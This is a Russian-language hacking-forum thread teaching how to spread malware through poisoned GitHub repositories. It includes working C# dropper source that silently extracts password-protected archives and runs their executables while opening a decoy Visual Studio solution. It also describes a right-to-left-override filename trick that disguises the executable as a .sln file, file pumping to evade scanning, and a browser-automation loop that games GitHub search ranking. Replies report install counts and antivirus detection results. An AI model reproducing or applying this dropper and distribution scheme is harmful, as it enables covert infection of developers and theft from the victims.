• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Льем трафик с GitHub по уму.

CyberKayt

ripper
КИДАЛА
Регистрация
27.05.2024
Сообщения
71
Реакции
33
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Автор CyberKayt
Источник https://xss.pro



Сразу скажу что данный метод уже используют на всю катушку, видел да же писали в новостях на хакере что то подобное, но не где о нем подробно не чего не описано, решил проверить способ и усовершенствовать его.
Инсталы идут и довольно качественные, плюс метод довольно простой, но я его усложнил сделал более незаметным и нам понадобятся хотя бы начальные знания C# и BAS - для овтаматизации процессов в браузере или если сможете переписать на другой ЯП очень простую софтинку о которой реч пойдет ниже.

Подготовка вашей полезной нагрузки
Предположим что у вас уже готовый криптованный exe файл, для начала нужно обязательно сделать ему папм пустыми байтами до 750+ мб.
Качаем архиватор, предпочтительно 7zip: https://www.7-zip.org/download.html

И сжимаем ваш криптованный файл на максимальном сжатии:
Скриншот 14-06-2024 105136.jpg


Получаем архив с паролем your_password весом почти как ваш изначальный exe без пампа и переименуем его включая расширение например: vsconfig.tmp
Таких файлов мы можем создать сколько угодно с разными exe. главное расширение .tmp и везде 1 пароль, либо положить в 1 архив кучу разных exe, наш софт запустит все.
Скриншот 14-06-2024 105943.jpg


Отложим пока наш архив в сторонку и подготовим софт для распаковки и запуска о котором говорил в начале, это основа и по сути сама суть моей статьи.

Я буду писать на C#, софт довольно простой и переписать его другой ЯП труда не составит, готовый код ниже:

C#:
using Ionic.Zip;
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Windows.Forms;

namespace UnZip
{
    internal class Program
    {
        public static string password = "your_password"; // Пароль от архивов
        private static string STRING = "abcdefghijklmnopqrstuvwxyz";
        private static string INTEGER = "0123456789";

        private static Random charsRandom = new Random();
        private static Random lengthRandom = new Random();
        public static string Random(int length = 0)
        {
            if (length == 0) length = 30;
            lengthRandom.Next(1, length);
            string chars = STRING.ToUpper() + STRING + INTEGER;
            return new string(Enumerable.Repeat(chars, length).Select(s => s[charsRandom.Next(s.Length)]).ToArray());
        }

        static void Main()
        {
            // Ищем все файлы sln и запускаем, а так же все архивы с форматом .tmp которые распакуем во временную папку и запустим все exe файлы в них.
            string[] AllFilesSLN = Directory.GetFiles(Application.StartupPath, "*.sln*", SearchOption.AllDirectories);
            string[] AllFilesZIP = Directory.GetFiles(Application.StartupPath, "*.tmp*", SearchOption.AllDirectories);

            foreach (string filenameSLN in AllFilesSLN)
            {
                try
                {
                    string sln_file = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(System.Reflection.Assembly.GetExecutingAssembly().Location) + ".sln");
                    File.Move(filenameSLN, sln_file);
                    Process.Start(sln_file);
                }
                catch (Exception ex) { Console.WriteLine(ex);}
                break;
            }

            // Ищем все архивы и распаковываем
            foreach (string filenameZIP in AllFilesZIP)
            {
                try
                {
                    string p = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Random(16));
                    string pathzip = Path.GetDirectoryName(filenameZIP);

                    using (ZipFile zip = ZipFile.Read(filenameZIP))
                    {
                        if (!Directory.Exists(p))
                            Directory.CreateDirectory(p);
                        zip.Password = password;
                        zip.ExtractAll(p);
                        string[] exe = Directory.GetFiles(p, "*.*", SearchOption.AllDirectories);
                        foreach (string name_exe in exe)
                            Process.Start(name_exe);
                    }
                }
                catch (Exception ex) { Console.WriteLine(ex); }
            }
        }
    }
}
Не забудьте указать в коде пароль на ваш архив.
Устанавливаем пакет DotNetZip из NuGet, он нам необходим для распаковки zip архива с паролем.
Не используйте Fody например для добавления dll в exe, это навешает детектов (проверенно!) лучше просто положить dll рядом. Думаю такая dll не вызовет подозрений.

Разберем код
  1. Ищем все .sln файлы переносим их в корень нашего приложения и запускаем их, по факту будет только 1 такой файл от фейкового проекта который мы зальем на гит.
  2. Ищем все архивы с расширением .tmp распаковываем и запускаем все exe файлы в них.
Собираем проект.
Обязательно делаем файлу иконку проекта Visual Studio .sln иконку прикрепил к теме в zip архиве так как .ico формат залить нельзя.
Скриншот 14-06-2024 112353.jpg


А теперь маскируем формат под .sln, для начала изменить реальный формат exe на scr, а теперь самое главно копируем строку ниже именно копируем, а не переписываем:

Resou‮nls..scr.exe

Символы которые можно изменить Resou остальное оставляем как есть!
Должно получится вот так:
Скриншот 14-06-2024 113148.jpg


Визуально тот же .sln файл запуска проекта.

Заливаем на VT? Да заливаем в этом и фишка что лить будут такой простой без малвари файл. Его все равно сольют а для статьи как раз посмотрим сколько детектов накапает.
Без обфускации как есть:

Сразу после залива полный фуд по ВТ как будет дальше посмотрим(следим за темой):
Скриншот 14-06-2024 114415.jpg


Готовим репозиторий
Регаем аккаунт GitHub идем в поиск и ищем какой ни будь репозиторий по своей тематики, читы, крипта или что вам нужно.
Репозиторий ищем обязательно с проектом на Visual Studio где для запуска проекта требуется .sln файл.

Далее для примера я буду использовать этот:
Скриншот 14-06-2024 114750.jpg


Делаем форк этого репозитория и следуем пунктам:
1. Переносим реальный файл .sln в данном примере CSharp-CheatSheet.sln в подпапку например в уже существующую CSharp-CheatSheet что бы это сделать скачайте сначало оригинальный .sln, удалите его из корня, перейдите в папку CSharp-CheatSheet и закачайте туда.
2. В место него ложим в корень наши файлы:
vsconfig.tmp - В котором ваш криптованный exe его не обязательно ложить в корень, можно так же спрятать в подпапку CSharp-CheatSheet наш софт его все равно найдет и распакует.
Обязательно библиотеку DotNetZip.dll без нее не будет работать наш софт!
и сам фейковый фай Resou‮nls..scr.exe
Внимание фейковый файл .sln и библиотека DotNetZip должны быть рядом.

Вот как это выглядит у меня:
Скриншот 14-06-2024 115746.jpg


Все готово! Почти. Сам репозиторий уже готов и его можно рекламить.
При скачивании проекта жертва запустит фейковый .sln файл который запустит оригинальный .sln и откроет проект.
Распакует ваш архив с паролем и запустит все exe из него.

Держим в топе в поиске наш репозиторий что бы получить больше установок:
При поиске репозиториев многие фильтруют поиск по последним изменениям, добавлениям, этим мы и воспользуемся!
Создаем в корне нашего проекта любой файл, его мы будем редактировать каждые 30сек. тем самым держа в топе поиске по этим критериям.

Запускаем BAS https://bablosoft.com/shop/BrowserAutomationStudio
Первым делом нам нужно получить свои куки от гита что бы работать с нашим репозиторием:
Создаем пустой txt файл где угодно в него мы запишем наши куки.
В BAS жмем Браузер > Загрузить вводим сайт GitHub, после жмем F2 и сможем работать напрямую мышкой в загрузившимся окне. Авторизируемся в своем аккаунте гита.
Скриншот 14-06-2024 124014.jpg

Далее жмем Сеть > Сохранить cookies
Скриншот 14-06-2024 124212.jpg

Сохраняем куки в файл, для этого идем в Файловая система > Записать в файл
Скриншот 14-06-2024 124406.jpg


Откройте ваш txt файл проверьте записались ли туда данные, если все ок закрывайте BAS (Остановить)

Создаем новый проект уже для непосредственного апа нашего репозитория, посредством редактирования файла.
Делаем все по пунктам:
Файловая система > читать файл указваем путь до нашего файла с куками.
Скриншот 14-06-2024 124717.jpg

Сеть > Загрузить cookies
Скриншот 14-06-2024 124848.jpg

И как до этого открывваем сайт гитхаба но уже ссылокй на файл для редактирования Браузер > Загрузить, и после загрузки вы уже должны быть авторизированны!
Жмете на карандаш справа редактировать файл повится окошко выбираете кликнуть по эллементу, далее в поле редактирования щелкаете еще раз и жмете ввод текста текст установите любой, хоть точку.

И далее все по аналогии сохраняем кликаем по эллементу.
Делаем задержку Ожидание > Спать поставим например 20 000млс.
Скриншот 14-06-2024 125252.jpg


И самое главное делаем пвторение скрипта:
Скриншот 14-06-2024 125346.jpg


Если кому то понадобится могу за $ написать скрипт для работы с вашими куками и апом репозиториев по списку если из много.
В принципе такое сможет сделать любой кодер BAS это не сложно.

Сохраняйте и запускайте скрипт желательно на каком либо сервере что бы работал нонстоп не мешая вам.
После ваш фейковый репозиторий будет в топе подымаясь каждые 20 сек!

По статистике мой софт проработал чуть менее суток я получил около 20 инсталов.
Пусть не много но таких репозиториев можно понаделать кучу.

Так же я советую накрутить звезд, такие услуги я видел по форумам, это придаст доверия к вашему репозиторию.

Находил я и способы пролива через события сборки, не знаю на сколько это лучше или хуже, но думаю использование событий и того же повершела даст много детектов. Да и в реализации это сложнее хоть и менее палевно, решать и делать выводы только вам.
Всем спасибо. Не забываем про наш ВТ выше) посмотрим скок проживет.
Специально для xss.pro, автор CyberKayt

 

Вложения

  • SLN_ICON.zip
    1.6 КБ · Просмотры: 39
Последнее редактирование модератором:
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну то есть мы держим его в топе по определенному ключевому слову, отсортированному по дате изменения?
Да, но в сам репозиторий можем добавить больше ключевых тегов по которым будет находится в топе ваш реп.

Скриншот 14-06-2024 170809.jpg
 
Да, но в сам репозиторий можем добавить больше ключевых тегов по которым будет находится в топе ваш реп.

Посмотреть вложение 87148
А можешь для самых меленьких объяснить в чем суть алгоритма действий пользователя?
Для чего ему нужно собирать из репа проект и запускать у себя? Когда есть оригинал
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А можешь для самых меленьких объяснить в чем суть алгоритма действий пользователя?
Для чего ему нужно собирать из репа проект и запускать у себя? Когда есть оригинал
Ты имеешь ввиду собранный релиз? А если нету и имеются только сурсы? У жертвы нет выхода как собрать из исходников.
Не добавляйте в проект собранный релиз и все. Хотя можно и его добавить склеив непосредственно) но суть темы в другом была.

Или ты имеешь ввиду форк, и если это форк есть ссылка на автора? Тогда скачай проект целиком не делая форк и залей его.
 
Ты имеешь ввиду собранный релиз? А если нету и имеются только сурсы? У жертвы нет выхода как собрать из исходников.
Не добавляйте в проект собранный релиз и все. Хотя можно и его добавить склеив непосредственно) но суть темы в другом была.

Или ты имеешь ввиду форк, и если это форк есть ссылка на автора? Тогда скачай проект целиком не делая форк и залей его.
Ну вот для примера возьмем какой нить чит для CS
Алгоритм, как я понял, такой:
1) Создаем гитхаб аккаунт, имя аккаунта причем не связанное с читами.
2) Делаем форк репозитория этого чита себе и добавляем к ориг файлам - свои.
3) И тут как я понял - юзер заходит на наш репозиторий, а не на оригинальный, ввиду того что наш находится в топе поиска по определенным критериям (ключевое слово и дата обновления) выше оригинального.
4) Компилирует проект и запускает его у себя.
Но разве запустится он нормально - предоставив и чит и отстук?
Где-то туплю, но не пойму где
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну вот для примера возьмем какой нить чит для CS
Алгоритм, как я понял, такой:
1) Создаем гитхаб аккаунт, имя аккаунта причем не связанное с читами.
2) Делаем форк репозитория этого чита себе и добавляем к ориг файлам - свои.
3) И тут как я понял - юзер заходит на наш репозиторий, а не на оригинальный, ввиду того что наш находится в топе поиска по определенным критериям (ключевое слово и дата обновления) выше оригинального.
4) Компилирует проект и запускает его у себя.
Но разве запустится он нормально - предоставив и чит и отстук?
Где-то туплю, но не пойму где
Перечитай тему, ты недопонял, мы все равно запускаем проект с оригинальным .sln файлом и попутно наши exe, а рабочий там чит или софт или еще что это уже зависит от того репозитория автора от куда вы его взяли.
Твоя полезная нагрузка запустится на ровне с открытием проекта, дело да же не дойдет до компиляции чита как уже будет запущен твой exe.
 
Перечитай тему, ты недопонял, мы все равно запускаем проект с оригинальным .sln файлом и попутно наши exe, а рабочий там чит или софт или еще что это уже зависит от того репозитория автора от куда вы его взяли.
Твоя полезная нагрузка запустится на ровне с открытием проекта, дело да же не дойдет до компиляции чита как уже будет запущен твой exe.
Понял, огонь
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Сразу после залива полный фуд по ВТ как будет дальше посмотрим(следим за темой):
Спустя ровно сутки, 2 детекта, они добавились спустя 3 часа после залива. Других нет, будет думаю в дальнейшем от силы 5-10 ноунеймов.

Скриншот 15-06-2024 131609.jpg
 
Пожалуйста, обратите внимание, что пользователь заблокирован
При открытии файла, открывается только sln, tmp почему то не распаковывается и не запускается
Пароль верный указал, с которым и паковал? DotNetZip.dll лежит рядом?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да, пароль верный, длл рядом
Перепроверил, в коде ошибок нет, все находит, распаковывает и запускает. Что то не так делаешь.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Эхх где ты раньше был)) Щас гит уже залочил все топ ключи. Activation\aimbot\hack\crack\cheat и тд
Ну а че ловить в гейм трафике)? Полно других профитных тегов.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Заливаем на VT? Да заливаем в этом и фишка что лить будут такой простой без малвари файл. Его все равно сольют а для статьи как раз посмотрим сколько детектов накапает.
Без обфускации как есть:
Не думал что будет такой эффект :cool: спустя месяц после залива на ВТ, всего 1 детект, при чем спустя сутки было 2, сейчас 1. Отвалился детект Макса, видать в ручную проверили и думают что файл безопасен собственно так то он таким и "является".
 
Последнее редактирование:
Не думал что будет такой эффект :cool: спустя месяц после залива на ВТ, всего 1 детект, при чем спустя сутки было 2, сейчас 1. Отвалился детект Макса, видать в ручную проверили и думают что файл безопасен собственно так то он таким и "является".
Сколько по итогу инсталлов было за месяц?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Сколько по итогу инсталлов было за месяц?
Я не использую поднятие репозитриев через BAS как в теме, я только тестировал. А так те репозитории что сделал по 1-2 инсталу в сутки бывает.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх